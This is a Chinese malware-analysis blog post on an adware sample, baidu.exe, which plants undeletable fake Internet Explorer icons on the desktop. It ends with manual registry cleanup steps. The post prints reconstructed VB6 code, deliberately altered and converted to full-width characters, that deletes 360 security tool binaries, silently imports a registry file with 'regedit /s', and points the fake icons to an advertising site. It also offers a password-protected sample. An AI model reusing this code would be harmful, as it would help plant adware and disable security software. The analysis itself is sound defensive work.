删不掉的图标之一：baidu.exe

我自己的桌面上经常会有一些删不掉的图标，国内一些网站太恶心，为了赚钱乱绑东西，捆的东西就更恶心了，一大堆烂图标删不掉就瘫在桌面上了，正好昨天遇到一个品种齐全的图标帝，这几天正好有时间，我来一个个的看看他们到底是怎么把图标放上去的。样本位于昨天的预警列表。

文件: baidu.exe
语言: Microsoft Visual Basic 6.0
类型: AD/HomePager
MD5 : 4C4C4BADBE21CA5EC59A4D3EB852905F
加壳: -
大小: 40,960 字节
时间: 2010-7-22 19:03:37
www.sacour.cn 转载保留此行

感染后症状：桌面多出来两个快捷方式，无法删除。指向hxxp://www.haol23.cc。

截图：

 

分析：

免责声明：以下代码根据当事人犯罪时的动作实时记录，可能有误。部分地方故意做出了修改，并且代码转成了全角。

Ｐｒｉｖａｔｅ  Ｓｕｂ  Ｆｏｒｍ１_Ｌｏａｄ()
Ｄｉｍ  ｓ  ａｓ  ｓｔｒｉｎｇ
Ｄｉｍ  ｏ  ａｓ  ｏｂｊｅｃｔ
Ｄｉｍ  ｎ  ａｓ  ｓｔｒｉｎｇ,  ｐ  ａｓ  ｓｔｒｉｎｇ,  ｔ  ａｓ  ｓｔｒｉｎｇ,  ｒ()  ａｓ  ｂｙｔｅ
    Ｒａｎｄｏｍｉｚｅ(１０)    '抽了个随机数
    Ｉｆ  Ｒｎｄ()  >  ０  Ｔｈｅｎ 
          Ｉｆ  ｓ<>"３６０ｓａｆｅ.ｅｘｅ"  Ｔｈｅｎ
              ｓ="３６０ｓａｆｅ.ｅｘｅ"    'ｓ的值就为３６０ｓａｆｅ.ｅｘｅ了
          Ｅｎｄｉｆ
          Ｉｆ  ｓ<>"３６０ｓａｆｅ.ｅｘｅ"  Ｔｈｅｎ
              ｓ="３６０ｓｄ.ｅｘｅ"
          Ｅｎｄｉｆ
          Ｉｆ  ｓ<>"３６０ｓａｆｅ.ｅｘｅ"  Ｔｈｅｎ
              ｓ="３６０ｔｒａｙ.ｅｘｅ"
          Ｅｎｄｉｆ         
          Ｓｅｔ  ｏ=ＣｒｅａｔｅＯｂｊｅｃｔ("ＷＳｃｒｉｐｔ.Ｓｈｅｌｌ")
          ｎ=ｏ.ＲｅｇＲｅａｄ("ＨＫＥＹ_ＬＯＣＡＬ_ＭＡＣＨＩＮＥ\ＳＯＦＴＷＡＲＥ\Ｍｉｃｒｏｓｏｆｔ\Ｗｉｎｄｏｗｓ\ＣｕｒｒｅｎｔＶｅｒｓｉｏｎ\Ｅｘｐｌｏｒｅｒ\Ｓｈｅｌｌ  Ｆｏｌｄｅｒｓ\Ｃｏｍｍｏｎ  Ｓｔａｒｔｕｐ")
                          '这儿是用来获取路径的
          ｓ="Ｃ:\ｗｉｎｄｏｗｓ\ｓｙｓｔｅｍ３２\"  &  ｓ
          ｐ=Ａｐｐ.Ｐａｔｈ  &  "\"  &  Ａｐｐ.ＥｘｅＮａｍｅ  &  ".ｅｘｅ"
          Ｃａｌｌ  ＭｏｖｅＦｉｌｅＥｘ(ｐ,"",０)    '删除自己
          ｎ=ｎ  &  "\"
          Ｃａｌｌ  ＭｏｖｅＦｉｌｅＥｘ(ｓ,"",０)  '试图删除ｓｙｓ３２\３６０ｓａｆｅ.ｅｘｅ，忘了说了，该木马的另外一个组件就在ｓｙｓ３２\３６０.ｅｘｅ。
              Ｃａｌｌ  Ｓｕｂ_ＡｄｄＮｅｗＲｉｇｈｔＭｅｎｕＥｎｔｒｙ  '<-Ａｄｄ    ＨＫＣＲ\ＣＬＳＩＤ\{１ｆ４ｄｅ３７０-ｂａ４ｆ-１１ｄ１-ｄ６２７-００ａ０ｃ９１ｅｅｄｂａ}\Ｉｎｓｔａｎｃｅ\ＩｎｉｔＰｒｏｐｅｒｔｙＢａｇ",  "Ｐａｒａｍ１"===>ｈｔｔｐ://%７７%７７%７７%２ｅ%６８%６１%６ｆ%６ｃ%３２%３３%２ｅ%６３%６３  (即添加一个假的ＩＥ图标指向自己网站)
          ｔ=ＧｅｔＴｅｍｐ()    'ＧｅｔＴｅｍｐ()是该程序的一个子函数，只是将ＧｅｔＴｅｍｐＰａｔｈ调用简化了一下而已
          ｔ=ｔ  &  "\ｔｔ.ｒｅｇ"
          ｒ()=ＬｏａｄＲｅｓＤａｔａ(１０１,"ＣＵＳＴＯＭ")    '读取资源
          Ｏｐｅｎ  ｔ  Ｆｏｒ  ＯｕｔＰｕｔ  ａｓ  #１
              Ｐｕｔ  #１,,ｔ
          Ｃｌｏｓｅ  #１
          Ｓｈｅｌｌ  "ｒｅｇｅｄｉｔ  /ｓ  "  &  ｔ,  ｖｂＭｉｎｉｍｉｚｅｄＦｏｃｕｓ    '将资源内数据保存到文件并导入注册表
          Ｋｉｌｌ  ｔ
          Ｅｎｄ 
Ｅｎｄ  Ｓｕｂ

资源文件（REG文件）：

201007231319050867.zip （密码infected）

看一下就知道了，资源文件其实又是新建了一个假的IE图标，位于
ＨＫＥＹ_ＣＬＡＳＳＥＳ_ＲＯＯＴ\ＣＬＳＩＤ\{１ｆ４ｄｅ３７０-ｄ６２７-１１ｄ１-ｂａ４ｆ-００ａ０ｃ９１ｅｅｄｂａ}
只不过显示的名字改成了“淘宝热卖”

加上之前新建的那个“热卖”的，注意CLSID和上面的不一样啊，不要删了一个就跑了：
ＨＫＥＹ_ＣＬＡＳＳＥＳ_ＲＯＯＴ\ＣＬＳＩＤ\{１ｆ４ｄｅ３７０-ｂａ４ｆ-１１ｄ１-ｄ６２７-００ａ０ｃ９１ｅｅｄｂａ}

而另一个假IE图标则很明显了，在代码里面也能看到
ＨＫＥＹ_ＣＬＡＳＳＥＳ_ＲＯＯＴ\ＣＬＳＩＤ\{Ｃ４２ＥＢ５Ａ１-０ＥＥＤ-Ｅ５４９-９１Ｂ０-７７５８５２０１３５２１}

鉴于他自己清理工作比较完美，不仅删了恶意的REG文件，还把自己跟同伴一起干掉了，所以剩余的清理也是比较容易的：

1. 开始－运行－regedit

2. 定位到上面三个注册表项。

3. 右键删除

4. 回到桌面，刷新

5. 选中图标按Delete键，删除。

6. 重启或注销即可。